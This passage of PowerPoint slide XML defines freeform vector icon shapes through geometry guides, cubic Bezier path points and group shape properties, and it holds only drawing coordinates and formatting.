                    <a:pt x="108" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="101" y="119"/>
                    <a:pt x="94" y="132"/>
                    <a:pt x="88" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="159"/>
                    <a:pt x="80" y="173"/>
                    <a:pt x="80" y="187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="188"/>
                    <a:pt x="80" y="189"/>
                    <a:pt x="79" y="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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="92" name="Freeform 1254"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8256554" y="-234374"/>
              <a:ext cx="185153" cy="301151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 38 w 117"/>
                <a:gd name="T1" fmla="*/ 189 h 189"/>
                <a:gd name="T2" fmla="*/ 27 w 117"/>
                <a:gd name="T3" fmla="*/ 137 h 189"/>
                <a:gd name="T4" fmla="*/ 8 w 117"/>
                <a:gd name="T5" fmla="*/ 101 h 189"/>
                <a:gd name="T6" fmla="*/ 0 w 117"/>
                <a:gd name="T7" fmla="*/ 74 h 189"/>
                <a:gd name="T8" fmla="*/ 0 w 117"/>
                <a:gd name="T9" fmla="*/ 59 h 189"/>
                <a:gd name="T10" fmla="*/ 0 w 117"/>
                <a:gd name="T11" fmla="*/ 14 h 189"/>
                <a:gd name="T12" fmla="*/ 14 w 117"/>
                <a:gd name="T13" fmla="*/ 0 h 189"/>
                <a:gd name="T14" fmla="*/ 27 w 117"/>
                <a:gd name="T15" fmla="*/ 14 h 189"/>
                <a:gd name="T16" fmla="*/ 27 w 117"/>
                <a:gd name="T17" fmla="*/ 57 h 189"/>
                <a:gd name="T18" fmla="*/ 34 w 117"/>
                <a:gd name="T19" fmla="*/ 78 h 189"/>
                <a:gd name="T20" fmla="*/ 66 w 117"/>
                <a:gd name="T21" fmla="*/ 113 h 189"/>
                <a:gd name="T22" fmla="*/ 68 w 117"/>
                <a:gd name="T23" fmla="*/ 115 h 189"/>
                <a:gd name="T24" fmla="*/ 75 w 117"/>
                <a:gd name="T25" fmla="*/ 115 h 189"/>
                <a:gd name="T26" fmla="*/ 75 w 117"/>
                <a:gd name="T27" fmla="*/ 108 h 189"/>
                <a:gd name="T28" fmla="*/ 67 w 117"/>
                <a:gd name="T29" fmla="*/ 98 h 189"/>
                <a:gd name="T30" fmla="*/ 50 w 117"/>
                <a:gd name="T31" fmla="*/ 79 h 189"/>
                <a:gd name="T32" fmla="*/ 58 w 117"/>
                <a:gd name="T33" fmla="*/ 58 h 189"/>
                <a:gd name="T34" fmla="*/ 70 w 117"/>
                <a:gd name="T35" fmla="*/ 61 h 189"/>
                <a:gd name="T36" fmla="*/ 105 w 117"/>
                <a:gd name="T37" fmla="*/ 97 h 189"/>
                <a:gd name="T38" fmla="*/ 116 w 117"/>
                <a:gd name="T39" fmla="*/ 129 h 189"/>
                <a:gd name="T40" fmla="*/ 104 w 117"/>
                <a:gd name="T41" fmla="*/ 189 h 189"/>
                <a:gd name="T42" fmla="*/ 38 w 117"/>
                <a:gd name="T4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7" h="189">
                  <a:moveTo>
                    <a:pt x="38" y="189"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="171"/>
                    <a:pt x="34" y="153"/>
                    <a:pt x="27" y="137"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="125"/>
                    <a:pt x="14" y="113"/>
                    <a:pt x="8" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="92"/>
                    <a:pt x="0" y="84"/>
                    <a:pt x="0" y="74"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="69"/>
                    <a:pt x="0" y="64"/>
                    <a:pt x="0" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="44"/>
                    <a:pt x="0" y="29"/>
                    <a:pt x="0" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="5"/>
                    <a:pt x="6" y="0"/>
                    <a:pt x="14" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="0"/>
                    <a:pt x="27" y="6"/>
                    <a:pt x="27" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="28"/>
                    <a:pt x="27" y="43"/>
                    <a:pt x="27" y="57"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="65"/>
                    <a:pt x="29" y="72"/>
                    <a:pt x="34" y="78"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="89"/>
                    <a:pt x="55" y="101"/>
                    <a:pt x="66" y="113"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="113"/>
                    <a:pt x="67" y="114"/>
                    <a:pt x="68" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="117"/>
                    <a:pt x="73" y="117"/>
                    <a:pt x="75" y="115"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="78" y="113"/>
                    <a:pt x="77" y="110"/>
                    <a:pt x="75" y="108"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="72" y="104"/>
                    <a:pt x="70" y="101"/>
                    <a:pt x="67" y="98"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="92"/>
                    <a:pt x="55" y="85"/>
                    <a:pt x="50" y="79"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="71"/>
                    <a:pt x="48" y="60"/>
                    <a:pt x="58" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="57"/>
                    <a:pt x="67" y="58"/>
                    <a:pt x="70" y="61"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="73"/>
                    <a:pt x="94" y="85"/>
                    <a:pt x="105" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="106"/>
                    <a:pt x="116" y="117"/>
                    <a:pt x="116" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="150"/>
                    <a:pt x="110" y="169"/>
                    <a:pt x="104" y="189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="82" y="189"/>
                    <a:pt x="60" y="189"/>
                    <a:pt x="38"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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="Freeform 1259"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8551013" y="-238835"/>
              <a:ext cx="11154" cy="22308"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 4 w 7"/>
                <a:gd name="T1" fmla="*/ 0 h 15"/>
                <a:gd name="T2" fmla="*/ 3 w 7"/>
                <a:gd name="T3" fmla="*/ 15 h 15"/>
                <a:gd name="T4" fmla="*/ 4 w 7"/>
                <a:gd name="T5" fmla="*/ 0 h 15"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7" h="15">
                  <a:moveTo>
                    <a:pt x="4" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="5"/>
                    <a:pt x="7" y="11"/>
                    <a:pt x="3" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="10"/>
                    <a:pt x="0" y="5"/>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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Freeform 1260"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8562166" y="-245528"/>
              <a:ext cx="11154" cy="24538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 6"/>
                <a:gd name="T1" fmla="*/ 15 h 15"/>
                <a:gd name="T2" fmla="*/ 4 w 6"/>
                <a:gd name="T3" fmla="*/ 0 h 15"/>
                <a:gd name="T4" fmla="*/ 2 w 6"/>
                <a:gd name="T5" fmla="*/ 15 h 15"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6" h="15">
                  <a:moveTo>
                    <a:pt x="2" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="2"/>
                    <a:pt x="4" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="5"/>
                    <a:pt x="6" y="11"/>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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="95" name="Freeform 1261"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8544320" y="-234374"/>
              <a:ext cx="6693" cy="24538"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 4"/>
                <a:gd name="T1" fmla="*/ 15 h 15"/>
                <a:gd name="T2" fmla="*/ 3 w 4"/>
                <a:gd name="T3" fmla="*/ 0 h 15"/>
                <a:gd name="T4" fmla="*/ 1 w 4"/>
                <a:gd name="T5" fmla="*/ 15 h 15"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4" h="15">
                  <a:moveTo>
                    <a:pt x="1" y="15"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="2"/>
                    <a:pt x="3" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="8"/>
                    <a:pt x="3" y="13"/>
                    <a:pt x="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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="96" name="Freeform 1262"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8537628" y="-229912"/>
              <a:ext cx="6693" cy="22308"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 4"/>
                <a:gd name="T1" fmla="*/ 0 h 14"/>
                <a:gd name="T2" fmla="*/ 1 w 4"/>
                <a:gd name="T3" fmla="*/ 14 h 14"/>
                <a:gd name="T4" fmla="*/ 3 w 4"/>
                <a:gd name="T5" fmla="*/ 0 h 14"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4" h="14">
                  <a:moveTo>
                    <a:pt x="3" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="11"/>
                    <a:pt x="4" y="13"/>
                    <a:pt x="1" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="7"/>
                    <a:pt x="0" y="1"/>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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="97" name="Freeform 1263"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8517551" y="-218759"/>
              <a:ext cx="8923" cy="22308"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2 w 5"/>
                <a:gd name="T1" fmla="*/ 14 h 14"/>
                <a:gd name="T2" fmla="*/ 4 w 5"/>
                <a:gd name="T3" fmla="*/ 0 h 14"/>
                <a:gd name="T4" fmla="*/ 2 w 5"/>
                <a:gd name="T5" fmla="*/ 14 h 14"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5" h="14">
                  <a:moveTo>
                    <a:pt x="2" y="14"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="7"/>
                    <a:pt x="1" y="1"/>
                    <a:pt x="4" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="10"/>
                    <a:pt x="4" y="13"/>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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="Freeform 1264"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8526474" y="-223221"/>
              <a:ext cx="6693" cy="22308"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 3 w 5"/>
                <a:gd name="T1" fmla="*/ 0 h 14"/>
                <a:gd name="T2" fmla="*/ 2 w 5"/>
                <a:gd name="T3" fmla="*/ 14 h 14"/>
                <a:gd name="T4" fmla="*/ 3 w 5"/>
                <a:gd name="T5" fmla="*/ 0 h 14"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="0" t="0" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5" h="14">
                  <a:moveTo>
                    <a:pt x="3" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="5"/>
                    <a:pt x="5" y="10"/>
                    <a:pt x="2" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="9"/>
                    <a:pt x="0" y="4"/>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latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="99" name="Gruppieren 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7740790" y="4934072"/>
            <a:ext cx="549249" cy="613195"/>
            <a:chOff x="10498458" y="1039384"/>
            <a:chExt cx="459535" cy="495227"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="100" name="Freeform 1369"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10498458" y="1110768"/>
              <a:ext cx="459535" cy="352459"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 123 w 289"/>
                <a:gd name="T1" fmla="*/ 54 h 222"/>
                <a:gd name="T2" fmla="*/ 48 w 289"/>
                <a:gd name="T3" fmla="*/ 26 h 222"/>
                <a:gd name="T4" fmla="*/ 33 w 289"/>
                <a:gd name="T5" fmla="*/ 27 h 222"/>
                <a:gd name="T6" fmla="*/ 27 w 289"/>
                <a:gd name="T7" fmla="*/ 35 h 222"/>
                <a:gd name="T8" fmla="*/ 33 w 289"/>
                <a:gd name="T9" fmla="*/ 51 h 222"/>
                <a:gd name="T10" fmla="*/ 36 w 289"/>
                <a:gd name="T11" fmla="*/ 52 h 222"/>
                <a:gd name="T12" fmla="*/ 60 w 289"/>
                <a:gd name="T13" fmla="*/ 75 h 222"/>
                <a:gd name="T14" fmla="*/ 38 w 289"/>
                <a:gd name="T15" fmla="*/ 101 h 222"/>
                <a:gd name="T16" fmla="*/ 12 w 289"/>
                <a:gd name="T17" fmla="*/ 80 h 222"/>
                <a:gd name="T18" fmla="*/ 14 w 289"/>
                <a:gd name="T19" fmla="*/ 67 h 222"/>
                <a:gd name="T20" fmla="*/ 14 w 289"/>
                <a:gd name="T21" fmla="*/ 62 h 222"/>
                <a:gd name="T22" fmla="*/ 6 w 289"/>
                <a:gd name="T23" fmla="*/ 43 h 222"/>
                <a:gd name="T24" fmla="*/ 36 w 289"/>
                <a:gd name="T25" fmla="*/ 4 h 222"/>
                <a:gd name="T26" fmla="*/ 82 w 289"/>
                <a:gd name="T27" fmla="*/ 12 h 222"/>
                <a:gd name="T28" fmla="*/ 142 w 289"/>
                <a:gd name="T29" fmla="*/ 39 h 222"/>
                <a:gd name="T30" fmla="*/ 147 w 289"/>
                <a:gd name="T31" fmla="*/ 39 h 222"/>
                <a:gd name="T32" fmla="*/ 216 w 289"/>
                <a:gd name="T33" fmla="*/ 7 h 222"/>
                <a:gd name="T34" fmla="*/ 255 w 289"/>
                <a:gd name="T35" fmla="*/ 1 h 222"/>
                <a:gd name="T36" fmla="*/ 273 w 289"/>
                <a:gd name="T37" fmla="*/ 6 h 222"/>
                <a:gd name="T38" fmla="*/ 286 w 289"/>
                <a:gd name="T39" fmla="*/ 39 h 222"/>
                <a:gd name="T40" fmla="*/ 268 w 289"/>
                <a:gd name="T41" fmla="*/ 77 h 222"/>
                <a:gd name="T42" fmla="*/ 200 w 289"/>
                <a:gd name="T43" fmla="*/ 146 h 222"/>
                <a:gd name="T44" fmla="*/ 97 w 289"/>
                <a:gd name="T45" fmla="*/ 208 h 222"/>
                <a:gd name="T46" fmla="*/ 49 w 289"/>
                <a:gd name="T47" fmla="*/ 222 h 222"/>
                <a:gd name="T48" fmla="*/ 27 w 289"/>
                <a:gd name="T49" fmla="*/ 220 h 222"/>
                <a:gd name="T50" fmla="*/ 5 w 289"/>
                <a:gd name="T51" fmla="*/ 188 h 222"/>
                <a:gd name="T52" fmla="*/ 20 w 289"/>
                <a:gd name="T53" fmla="*/ 152 h 222"/>
                <a:gd name="T54" fmla="*/ 88 w 289"/>
                <a:gd name="T55" fmla="*/ 81 h 222"/>
                <a:gd name="T56" fmla="*/ 123 w 289"/>
                <a:gd name="T57" fmla="*/ 54 h 222"/>
                <a:gd name="T58" fmla="*/ 69 w 289"/>
                <a:gd name="T59" fmla="*/ 127 h 222"/>
                <a:gd name="T60" fmla="*/ 32 w 289"/>
                <a:gd name="T61" fmla="*/ 176 h 222"/>
                <a:gd name="T62" fmla="*/ 27 w 289"/>
                <a:gd name="T63" fmla="*/ 191 h 222"/>
                <a:gd name="T64" fmla="*/ 33 w 289"/>
                <a:gd name="T65" fmla="*/ 199 h 222"/>
                <a:gd name="T66" fmla="*/ 47 w 289"/>
                <a:gd name="T67" fmla="*/ 200 h 222"/>
                <a:gd name="T68" fmla="*/ 97 w 289"/>
                <a:gd name="T69" fmla="*/ 184 h 222"/>
                <a:gd name="T70" fmla="*/ 212 w 289"/>
                <a:gd name="T71" fmla="*/ 106 h 222"/>
                <a:gd name="T72" fmla="*/ 255 w 289"/>
                <a:gd name="T73" fmla="*/ 56 h 222"/>
                <a:gd name="T74" fmla="*/ 265 w 289"/>
                <a:gd name="T75" fmla="*/ 33 h 222"/>
                <a:gd name="T76" fmla="*/ 258 w 289"/>
                <a:gd name="T77" fmla="*/ 24 h 222"/>
                <a:gd name="T78" fmla="*/ 235 w 289"/>
                <a:gd name="T79" fmla="*/ 25 h 222"/>
                <a:gd name="T80" fmla="*/ 187 w 289"/>
                <a:gd name="T81" fmla="*/ 43 h 222"/>
                <a:gd name="T82" fmla="*/ 166 w 289"/>
                <a:gd name="T83" fmla="*/ 53 h 222"/>
                <a:gd name="T84" fmla="*/ 212 w 289"/>
                <a:gd name="T85" fmla="*/ 87 h 222"/>
                <a:gd name="T86" fmla="*/ 195 w 289"/>
                <a:gd name="T87" fmla="*/ 102 h 222"/>
                <a:gd name="T88" fmla="*/ 191 w 289"/>
                <a:gd name="T89" fmla="*/ 99 h 222"/>
                <a:gd name="T90" fmla="*/ 148 w 289"/>
                <a:gd name="T91" fmla="*/ 68 h 222"/>
                <a:gd name="T92" fmla="*/ 142 w 289"/>
                <a:gd name="T93" fmla="*/ 68 h 222"/>
                <a:gd name="T94" fmla="*/ 108 w 289"/>
                <a:gd name="T95" fmla="*/ 93 h 222"/>
                <a:gd name="T96" fmla="*/ 85 w 289"/>
                <a:gd name="T97" fmla="*/ 112 h 222"/>
                <a:gd name="T98" fmla="*/ 133 w 289"/>
                <a:gd name="T99" fmla="*/ 148 h 222"/>
                <a:gd name="T100" fmla="*/ 116 w 289"/>
                <a:gd name="T101" fmla="*/ 158 h 222"/>
                <a:gd name="T102" fmla="*/ 109 w 289"/>
                <a:gd name="T103" fmla="*/ 158 h 222"/>
                <a:gd name="T104" fmla="*/ 69 w 289"/>
                <a:gd name="T105" fmla="*/ 12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9" h="222">
                  <a:moveTo>
                    <a:pt x="123" y="54"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="42"/>
                    <a:pt x="75" y="30"/>
                    <a:pt x="48" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="25"/>
                    <a:pt x="38" y="26"/>
                    <a:pt x="33" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="27"/>
                    <a:pt x="26" y="30"/>
                    <a:pt x="27" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="40"/>
                    <a:pt x="31" y="46"/>
                    <a:pt x="33" y="51"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="52"/>
                    <a:pt x="35" y="52"/>
                    <a:pt x="36" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="53"/>
                    <a:pt x="59" y="62"/>
                    <a:pt x="60" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="88"/>
                    <a:pt x="52" y="100"/>
                    <a:pt x="38" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="102"/>
                    <a:pt x="13" y="92"/>
                    <a:pt x="12" y="80"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="76"/>
                    <a:pt x="13" y="71"/>
                    <a:pt x="14" y="67"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="65"/>
                    <a:pt x="14" y="64"/>
                    <a:pt x="14" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="56"/>
                    <a:pt x="8" y="50"/>
                    <a:pt x="6" y="43"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="21"/>
                    <a:pt x="13" y="5"/>
                    <a:pt x="36" y="4"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="3"/>
                    <a:pt x="67" y="6"/>
                    <a:pt x="82" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="19"/>
                    <a:pt x="123" y="28"/>
                    <a:pt x="142" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="40"/>
                    <a:pt x="145" y="40"/>
                    <a:pt x="147" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="26"/>
                    <a:pt x="192" y="15"/>
                    <a:pt x="216" y="7"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="3"/>
                    <a:pt x="241" y="0"/>
                    <a:pt x="255" y="1"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261" y="2"/>
                    <a:pt x="267" y="3"/>
                    <a:pt x="273" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="11"/>
                    <a:pt x="289" y="24"/>
                    <a:pt x="286" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="53"/>
                    <a:pt x="277" y="65"/>
                    <a:pt x="268" y="77"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="249" y="104"/>
                    <a:pt x="225" y="126"/>
                    <a:pt x="200" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="171"/>
                    <a:pt x="134" y="193"/>
                    <a:pt x="97" y="208"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="215"/>
                    <a:pt x="66" y="220"/>
                    <a:pt x="49" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="222"/>
                    <a:pt x="34" y="222"/>
                    <a:pt x="27" y="220"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="217"/>
                    <a:pt x="3" y="203"/>
                    <a:pt x="5" y="188"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="174"/>
                    <a:pt x="12" y="163"/>
                    <a:pt x="20" y="152"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="124"/>
                    <a:pt x="62" y="102"/>
                    <a:pt x="88" y="81"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="72"/>
                    <a:pt x="111" y="63"/>
                    <a:pt x="123" y="54"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="69" y="127"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="142"/>
                    <a:pt x="41" y="157"/>
                    <a:pt x="32" y="176"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="181"/>
                    <a:pt x="28" y="186"/>
                    <a:pt x="27" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="196"/>
                    <a:pt x="28" y="199"/>
                    <a:pt x="33" y="199"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="200"/>
                    <a:pt x="43" y="200"/>
                    <a:pt x="47" y="200"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="198"/>
                    <a:pt x="81" y="191"/>
                    <a:pt x="97" y="184"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="139" y="164"/>
                    <a:pt x="178" y="138"/>
                    <a:pt x="212" y="106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="228" y="91"/>
                    <a:pt x="244" y="75"/>
                    <a:pt x="255" y="56"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="260" y="49"/>
                    <a:pt x="264" y="42"/>
                    <a:pt x="265" y="33"/>
                  </a:cubicBezTo>
